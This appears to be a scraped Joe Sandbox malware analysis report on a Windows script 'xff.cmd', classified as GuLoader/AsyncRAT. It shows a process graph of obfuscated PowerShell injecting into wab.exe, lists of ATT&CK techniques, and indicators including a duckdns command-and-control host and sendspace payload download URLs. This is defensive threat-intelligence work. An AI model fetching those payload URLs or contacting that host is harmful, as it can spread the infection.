              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials14
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446785 Sample: xff.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 33 nmds.duckdns.org 2->33 35 www.sendspace.com 2->35 37 2 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 7 other signatures 2->55 10 cmd.exe 1 2->10         started        signatures3 53 Uses dynamic DNS services 33->53 process4 signatures5 61 Suspicious powershell command line found 10->61 63 Very long command line found 10->63 13 powershell.exe 14 23 10->13         started        17 conhost.exe 10->17         started        process6 dnsIp7 43 fs13n3.sendspace.com 69.31.136.57, 443, 49712 GTT-BACKBONEGTTDE United States 13->43 45 www.sendspace.com 104.21.28.80, 443, 49711, 49718 CLOUDFLARENETUS United States 13->45 65 Suspicious powershell command line found 13->65 67 Very long command line found 13->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 13->69 19 powershell.exe 17 13->19         started        22 conhost.exe 13->22         started        24 cmd.exe 1 13->24         started        signatures8 process9 signatures10 57 Writes to foreign memory regions 19->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 19->59 26 wab.exe 14 19->26         started        29 cmd.exe 1 19->29         started        process11 dnsIp12 39 nmds.duckdns.org 12.202.180.134, 49720, 8895 FISERV-INCUS United States 26->39 41 fs03n4.sendspace.com 69.31.136.17, 443, 49719 GTT-BACKBONEGTTDE United States 26->41 31 WerFault.exe 20 16 26->31         started        process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              xff.cmd3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://upx.sf.net0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.sendspace.com/pro/dl/ougyql0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              http://www.microsoft.co0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG800%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/yK0%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              https://fs13n3.sendspace.com0%Avira URL Cloudsafe
              https://fs03n4.sendspace.com/A0%Avira URL Cloudsafe
              nmds.duckdns.org100%Avira URL Cloudmalware
              http://fs13n3.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/ow91480%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/ow9148P0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs03n4.sendspace.com
              		69.31.136.17
              		truefalse
                		unknown
                fs13n3.sendspace.com
                		69.31.136.57
                		truefalse
                  		unknown
                  nmds.duckdns.org
                  		12.202.180.134
                  		truetrue
                    		unknown
                    www.sendspace.com
                    		104.21.28.80
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.sendspace.com/pro/dl/ougyqlfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfbfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.binfalse
                      • Avira URL Cloud: safe
                      		unknown
                      nmds.duckdns.orgtrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.sendspace.com/pro/dl/ow9148false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n4.sendspace.com/yKwab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://go.micropowershell.exe, 00000003.00000002.1788126978.000002AD42A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80wab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.0000000007591000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.microsoft.copowershell.exe, 0000000C.00000002.1675028556.0000000006D81000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://upx.sf.netAmcache.hve.23.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sendspace.compowershell.exe, 00000003.00000002.1788126978.000002AD4357B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs03n4.sendspace.com/wab.exe, 0000000F.00000003.1665443342.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.compowershell.exe, 00000003.00000002.1788126978.000002AD43086000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1672297363.000000000540B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://fs03n4.sendspace.com/Awab.exe, 0000000F.00000003.1657420139.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.sendspace.com/pro/dl/ow9148Ppowershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://fs13n3.sendspace.compowershell.exe, 00000003.00000002.1788126978.000002AD435B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fs13n3.sendspace.compowershell.exe, 00000003.00000002.1788126978.000002AD41C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1788126978.000002AD435A0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1788126978.000002AD417C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      69.31.136.17
                      		fs03n4.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse
                      12.202.180.134
                      		nmds.duckdns.orgUnited States
                      		22983FISERV-INCUStrue
                      104.21.28.80
                      		www.sendspace.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      69.31.136.57
                      		fs13n3.sendspace.comUnited States
                      		3257GTT-BACKBONEGTTDEfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446785
                      Start date and time:2024-05-23 21:07:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 40s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:xff.cmd
                      Detection:MAL
                      Classification:mal100.troj.evad.winCMD@14/14@4/4
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 91%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 7
                      Cookbook Comments:
                      • Found application associated with file extension: .cmd
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.42.73.29
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 4904 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7776 because it is empty
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: xff.cmd

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:08:06API Interceptor540x Sleep call for process: powershell.exe modified
                      15:08:51API Interceptor2535869x Sleep call for process: wab.exe modified
                      15:11:13API Interceptor1x Sleep call for process: WerFault.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      69.31.136.17las.cmdGet hashmaliciousGuLoaderBrowse
                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                          xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                            new.cmdGet hashmaliciousGuLoaderBrowse
                              las.cmdGet hashmaliciousGuLoaderBrowse
                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                  kam.cmdGet hashmaliciousGuLoaderBrowse
                                    upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                      update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                        file.vbsGet hashmaliciousGuLoaderBrowse
                                          12.202.180.134zap.cmdGet hashmaliciousUnknownBrowse
                                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                              update.cmdGet hashmaliciousUnknownBrowse
                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                  new.cmdGet hashmaliciousGuLoaderBrowse
                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                      kam.cmdGet hashmaliciousUnknownBrowse
                                                        sample.cmdGet hashmaliciousUnknownBrowse
                                                          zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                            xff.cmdGet hashmaliciousUnknownBrowse
                                                              104.21.28.80xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                  las.cmdGet hashmaliciousGuLoaderBrowse
                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                          file.vbsGet hashmaliciousGuLoaderBrowse
                                                                            windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                              update.vbsGet hashmaliciousGuLoaderBrowse
                                                                                69.31.136.57las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                      new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                          las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                  file.vbsGet hashmaliciousGuLoader, XWormBrowse

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    nmds.duckdns.orgxff.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                    • 87.121.105.4
                                                                                                    kam.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 87.121.105.4
                                                                                                    windows.vbsGet hashmaliciousXWormBrowse
                                                                                                    • 87.121.105.4
                                                                                                    fs03n4.sendspace.comnew.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                                                    • 69.31.136.17
                                                                                                    fs13n3.sendspace.comzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.57
                                                                                                    1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 69.31.136.57
                                                                                                    www.sendspace.comlas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSlas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fgoogle.jp%2famp%2fs%2fjbx.silsbeekiaimports.us&umid=7eb8d47e-9d0c-47da-ae2a-8c43fe69fc7e&auth=6c94a71134cc7c92741d5538b555b091522e5e80-6d0e2f552f3dd2ebe4b30ade9b482f57c85f8c8f#Z2F5bGVAc2hyZXZlcG9ydGNoYW1iZXIub3Jn%2Fhc%2Farticles%2F360001376909%3Futm_campaign%3Dorder-confirmation-transactional%26utm_source%3Dblueshift%26utm_medium%3Demail%26utm_content%3Dtest-new-prod-recs-v2-lousersed-transactional-order-confirmation&d=DwMFaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.17.2.184
                                                                                                    https://equifax.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=twn_noreply%40equifax.com&p=d5b52cbc-0569-42e0-86cf-8416889c1b1d#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fd5b52cbc-0569-42e0-86cf-8416889c1b1d%2Fdata%2Fmetadata&dk=CSTBBNbTEYumPZCavpjONtXXrHKWZsLJITyIS27OqaA%3DGet hashmaliciousUnknownBrowse
                                                                                                    • 104.16.117.116
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 172.67.170.105
                                                                                                    https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousUnknownBrowse
                                                                                                    • 104.17.3.184
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 172.67.170.105
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    GTT-BACKBONEGTTDElas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.57
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    GTT-BACKBONEGTTDElas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.57
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.17
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 69.31.136.53
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 69.31.136.53
                                                                                                    FISERV-INCUSzap.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134
                                                                                                    update.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 12.202.180.134
                                                                                                    kam.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    sample.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 12.202.180.134
                                                                                                    xff.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 12.202.180.134

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0elas.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    filePY.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.57
                                                                                                    37f463bf4616ecd445d4a1937da06e19las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17
                                                                                                    V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                                                                    • 104.21.28.80
                                                                                                    • 69.31.136.17

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

